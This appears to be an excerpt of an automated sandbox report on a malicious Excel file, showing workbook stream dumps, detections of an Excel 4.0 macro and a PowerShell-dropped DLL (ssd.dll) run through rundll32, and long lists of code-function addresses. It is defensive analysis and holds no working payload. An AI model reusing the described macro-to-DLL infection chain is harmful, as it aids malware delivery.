".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .....
                            Source: imedpub.com_10.xls.0.drStream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=.............................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......9...........C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .....
                            Powershell drops PE file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Documents\ssd.dllJump to dropped file
                            Found Excel 4.0 Macro with suspicious formulas
                            Source: imedpub.com_10.xlsInitial sample: EXEC
                            Source: imedpub.com_10.xlsInitial sample: EXEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100360079_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100410509_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003130F9_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100323E29_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100304609_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100415929_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003E59F9_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003960C9_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100317E29_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10040B0E9_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10031BB69_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10041C569_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10036CB59_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001CD169_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10042D219_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10031FC29_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0079F8FD9_2_0079F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0079E9919_2_0079E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0079AB879_2_0079AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A907F9_2_007A907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007920519_2_00792051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B00569_2_007B0056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007990119_2_00799011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A00019_2_007A0001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A20BA9_2_007A20BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007970B39_2_007970B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0079F09B9_2_0079F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A41169_2_007A4116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007951BB9_2_007951BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007981B79_2_007981B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007922519_2_00792251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AA2E89_2_007AA2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0079E2CC9_2_0079E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0079B2C79_2_0079B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007953619_2_00795361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007943469_2_00794346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B13AD9_2_007B13AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AC3A09_2_007AC3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AE3959_2_007AE395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AD3899_2_007AD389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A044F9_2_007A044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AF4359_2_007AF435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007964E29_2_007964E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0079A55F9_2_0079A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A25509_2_007A2550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007955489_2_00795548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A85199_2_007A8519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A95FA9_2_007A95FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0079E5CF9_2_0079E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AA6669_2_007AA666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AC6319_2_007AC631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A86069_2_007A8606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0079D6D89_2_0079D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A66CA9_2_007A66CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A176B9_2_007A176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0079B74D9_2_0079B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A473C9_2_007A473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007977359_2_00797735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007997149_2_00799714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007948169_2_00794816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A18899_2_007A1889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007989699_2_00798969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A894B9_2_007A894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007959F29_2_007959F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B09B59_2_007B09B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00791A569_2_00791A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AAA309_2_007AAA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0079EA999_2_0079EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0079BB7E9_2_0079BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007ACB5B9_2_007ACB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00798B3D9_2_00798B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007ABB239_2_007ABB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A0B199_2_007A0B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007ADBEA9_2_007ADBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A8BE39_2_007A8BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00792BD99_2_00792BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A9BCF9_2_007A9BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A7BA69_2_007A7BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00799B839_2_00799B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A4B879_2_007A4B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00794C5D9_2_00794C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A6C499_2_007A6C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AAC3A9_2_007AAC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00793C3C9_2_00793C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00797C379_2_00797C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B0C149_2_007B0C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007ADCF79_2_007ADCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A5CC49_2_007A5CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00796D249_2_00796D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A6DF89_2_007A6DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A7DD59_2_007A7DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00799DCF9_2_00799DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AAE6D9_2_007AAE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00795E609_2_00795E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A0E539_2_007A0E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B0E3A9_2_007B0E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00793E3F9_2_00793E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007ABE279_2_007ABE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0079AEFB9_2_0079AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007A9EEC9_2_007A9EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00794EE39_2_00794EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007ADEDC9_2_007ADEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0079EE819_2_0079EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0079CF479_2_0079CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007B0F339_2_007B0F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0079DFF39_2_0079DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00797FF29_2_00797FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00223C3C10_2_00223C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022901110_2_00229011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023044F10_2_0023044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002320BA10_2_002320BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022F8FD10_2_0022F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022D6D810_2_0022D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023411610_2_00234116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002413AD10_2_002413AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022AB8710_2_0022AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00227FF210_2_00227FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002259F210_2_002259F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002395FA10_2_002395FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023BE2710_2_0023BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023C63110_2_0023C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023AA3010_2_0023AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00227C3710_2_00227C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023F43510_2_0023F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023AC3A10_2_0023AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00223E3F10_2_00223E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00240E3A10_2_00240E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023000110_2_00230001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023860610_2_00238606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00240C1410_2_00240C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022481610_2_00224816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00225E6010_2_00225E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023A66610_2_0023A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023AE6D10_2_0023AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023907F10_2_0023907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00236C4910_2_00236C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00230E5310_2_00230E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0024005610_2_00240056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022205110_2_00222051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022225110_2_00222251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00221A5610_2_00221A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00224C5D10_2_00224C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002270B310_2_002270B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022EE8110_2_0022EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023188910_2_00231889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022F09B10_2_0022F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022EA9910_2_0022EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002264E210_2_002264E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00224EE310_2_00224EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023A2E810_2_0023A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00239EEC10_2_00239EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023DCF710_2_0023DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022AEFB10_2_0022AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022B2C710_2_0022B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00235CC410_2_00235CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002366CA10_2_002366CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022E2CC10_2_0022E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023DEDC10_2_0023DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023BB2310_2_0023BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00226D2410_2_00226D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022773510_2_00227735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00240F3310_2_00240F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023473C10_2_0023473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00228B3D10_2_00228B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022971410_2_00229714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023851910_2_00238519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00230B1910_2_00230B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022536110_2_00225361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023176B10_2_0023176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022896910_2_00228969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022BB7E10_2_0022BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022434610_2_00224346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022CF4710_2_0022CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023894B10_2_0023894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022554810_2_00225548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022B74D10_2_0022B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023255010_2_00232550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023CB5B10_2_0023CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022A55F10_2_0022A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023C3A010_2_0023C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00237BA610_2_00237BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002409B510_2_002409B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002281B710_2_002281B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002251BB10_2_002251BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00229B8310_2_00229B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00234B8710_2_00234B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023D38910_2_0023D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022E99110_2_0022E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023E39510_2_0023E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00238BE310_2_00238BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023DBEA10_2_0023DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022DFF310_2_0022DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00236DF810_2_00236DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00239BCF10_2_00239BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00229DCF10_2_00229DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022E5CF10_2_0022E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00237DD510_2_00237DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00222BD910_2_00222BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003600711_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1004105011_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003130F11_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100323E211_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003046011_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1004159211_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003E59F11_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003960C11_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100317E211_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10040B0E11_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10031BB611_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10041C5611_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10036CB511_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1001CD1611_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10042D2111_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10031FC211_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033F8FD11_2_0033F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033E99111_2_0033E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033AB8711_2_0033AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033901111_2_00339011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034000111_2_00340001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034907F11_2_0034907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033205111_2_00332051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035005611_2_00350056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003370B311_2_003370B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003420BA11_2_003420BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033F09B11_2_0033F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034411611_2_00344116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003381B711_2_003381B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003351BB11_2_003351BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033225111_2_00332251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034A2E811_2_0034A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033B2C711_2_0033B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033E2CC11_2_0033E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033536111_2_00335361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033434611_2_00334346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034C3A011_2_0034C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003513AD11_2_003513AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034E39511_2_0034E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034D38911_2_0034D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034F43511_2_0034F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034044F11_2_0034044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003364E211_2_003364E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034851911_2_00348519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034255011_2_00342550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033A55F11_2_0033A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033554811_2_00335548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003495FA11_2_003495FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033E5CF11_2_0033E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034C63111_2_0034C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034860611_2_00348606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034A66611_2_0034A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033D6D811_2_0033D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003466CA11_2_003466CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033773511_2_00337735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034473C11_2_0034473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033971411_2_00339714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034176B11_2_0034176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033B74D11_2_0033B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033481611_2_00334816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034188911_2_00341889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0033896911_2_00338969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0034894B11_2_0034894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003509B511_2_003509B5
